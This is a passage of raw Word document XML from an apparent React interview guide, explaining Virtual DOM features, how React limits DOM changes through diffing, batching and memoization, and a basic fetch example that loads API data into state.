          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>predictable</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, reducing potential bugs or inconsistencies in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D5F1FA"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0E55">
          <v:rect id="_x0000_i3806" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1025F"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2B4EEC5" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="00CE4B95" w:rsidRDefault="00207321"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807" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6216E6" w14:textId="45BA8884" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="009B0E0F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="935" w:name="_Toc197868149"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Features of Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="935"/>
    </w:p>
    <w:p w14:paraId="3A582158" w14:textId="34029482"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49C2F4">
          <v:rect id="_x0000_i3808" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057DB6E"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Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589EA6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and then updates only the changed parts of the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F2F47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w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a more </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>responsive application</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially for large-scale apps with frequent updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519890A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8DCC4">
          <v:rect id="_x0000_i3809" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F15AC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Reconciliation Algorithm (Diffing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35AD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compare (or "diff") the current Virtual DOM with the previous one to identify changes. This process is known as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1856ECC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works</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React performs a shallow comparison of the old and new Virtual DOM trees and determines the minimum set of changes to apply to the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C63BD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helps optimize performance by only updating the parts of the UI that have changed, rather than re-rendering everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F2DE7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A01AE">
          <v:rect id="_x0000_i3810" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="144CF43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Declarative UI Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740AC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he Virtual DOM, developers specify </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what the UI should look like</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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pproach reduces complexity and avoids side effects in the UI, allowing developers to focus on business logic and state management rather than manual DOM manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738ADEC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F25B6">
          <v:rect id="_x0000_i3811" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191384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omponent-Based Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2900C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 the Virtual DOM works seamlessly with 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Each component has its own state and renders based on that state, with the Virtual DOM representing the component’s rendered output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F102F0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modular approach improves code maintainability and reusability. It also enables the Virtual DOM to optimize the rendering of individual components without affecting the whole page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE9241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6851E">
          <v:rect id="_x0000_i3812" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A6C8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ross-Platform Rendering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C37A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cross-platform compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows developers to write code once and have it run across different platforms with minimal changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143DDE09"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6DAD1B">
          <v:rect id="_x0000_i3813" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="247BC56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Faster Repaints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50DAD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Reduced reflow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faster repaints</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure a smoother and more fluid user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3F3D2"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96E383">
          <v:rect id="_x0000_i3814" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D9083"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eparation of Concerns (UI and State Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636DC78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for a clear separation between the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UI</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the components' JSX and their representation) and the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xml:space="preserve"> (the data and logic). React manages the state changes and updates the Virtual DOM accordingly, ensuring that the UI is always in sync with the state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C93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separation improves </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows for easier debugging and testing of individual components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFDF9EC"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2F86C">
          <v:rect id="_x0000_i3815" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669DA35"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Platform Independence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4E65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be platform-agnostic. React Native, for instance, uses the Virtual DOM to update the user interface in native mobile apps on iOS and Android. Similarly, React can be used for other platforms like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual Reality (React VR)</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Desktop apps</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via Electron).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09647AB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ross-platform support</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows developers to use the same underlying concepts to build apps for different devices and platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC43DF4"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212D4A">
          <v:rect id="_x0000_i3816" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989AF6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Simplified Rendering Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BD71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bstraction simplifies the logic required to keep the UI up-to-date, making it easier for developers to manage and maintain their applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9F08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3327F">
          <v:rect id="_x0000_i3817" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C69C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Improved Performance with Batching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F35D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batching</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> process improves the efficiency of rendering and reduces the number of layout reflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6417D2DD"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4F7F9">
          <v:rect id="_x0000_i3818" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0101620C"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Consistency Across Renders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B203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a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistent UI</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is always in sync with the underlying application state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A081B"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9CA05">
          <v:rect id="_x0000_i3819" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5155CA2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63398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provides several key features that improve the performance and efficiency of rendering UIs in React. From optimizing updates and rendering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820" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="079480EB" w14:textId="32E07BC2" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="00C90812">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="936" w:name="_Toc197868150"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is reducing modifications in Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="936"/>
    </w:p>
    <w:p w14:paraId="14745967" w14:textId="61E05EED"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ere’s how </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other frameworks using the Virtual DOM reduce modifications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E539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Diffing Algorithm (Reconciliation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694902E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05594FF">
          <v:rect id="_x0000_i3821" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB262A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Level Reconciliation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E896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React isolates the updates to the components that need to be re-rendered, reducing the number of elements in the Virtual DOM that need to be modified and improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3CA2CA"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1B070">
          <v:rect id="_x0000_i3822" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E03A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 Reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E5F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reusing the nodes that haven’t changed, React minimizes the computational overhead and improves performance during state updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45822DE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A7C34">
          <v:rect id="_x0000_i3823" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27A58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Batched Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205DEC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batching updates, React avoids making multiple modifications to the Virtual DOM in a short time. It makes only one update to the real DOM, which reduces unnecessary operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F11A6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1B7D41">
          <v:rect id="_x0000_i3824" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8E5F40"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elective Rendering with shouldComponentUpdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE8C37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controlling whether or not a component should update, you can avoid modifying the Virtual DOM for components that don’t need to be re-rendered, reducing computational cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3497BAE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10074">
          <v:rect id="_x0000_i3825" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE9A47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ure Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56D80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PureComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of component that implements a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shallow comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of props and state to determine if a component needs to be re-rendered. If the props and state haven’t changed, the component will not be re-rendered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A934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Pure components help minimize the updates by skipping unnecessary re-renders when the data hasn’t changed, leading to fewer modifications to the Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D6A4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9B33D1">
          <v:rect id="_x0000_i3826" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21E932"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Memoization (React.memo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC1C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memo is a higher-order component that memoizes the result of a component’s render. If the component's props haven’t changed, React will skip rendering and reuse the previous output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CECB8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This prevents unnecessary renders of components whose props haven’t changed, reducing the number of updates to the Virtual DOM and real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0562580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1F8BF4">
          <v:rect id="_x0000_i3827" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7CC8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Selective Event Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF060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managing events and ensuring that only events that modify the state or UI cause updates, React avoids making unnecessary changes to the Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4935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DDDD">
          <v:rect id="_x0000_i3828" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4F0C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C5503E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Virtual DOM is a key part of React's optimization strategy. By leveraging techniques lik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mponent-level updates</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batched update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controlled rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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829" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D364658" w14:textId="4C5E2279" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="001E56EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="937" w:name="_Toc197868151"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What do you call the backend API from ReactJS</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="937"/>
    </w:p>
    <w:p w14:paraId="402C6668" w14:textId="1E59BDF3" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE"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JS, you can call the backend API using </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaScript's fetch API</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a third-party library like </w:t>
      </w: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These methods allow you to send HTTP requests to the backend server and receive responses that can be used to update the component's state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026177C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ing fetch API (Native JavaScript)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703CD88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fetch API is built into modern browsers and is a simple way to make asynchronous HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B4E3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fetch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09058EE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3547B006" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A389EF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09361EF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7C4F22BA" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F4257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6B4E35A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https://api.example.com/data')  // Replace with your API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CFEF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response.json())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7E3C9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data =&gt; setData(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E77E8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6ED6BF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5D54A140" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BAF40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92FCFD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A44254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API Data:&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13579A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22BE66A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7D73E9E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2E144B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7152B37" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
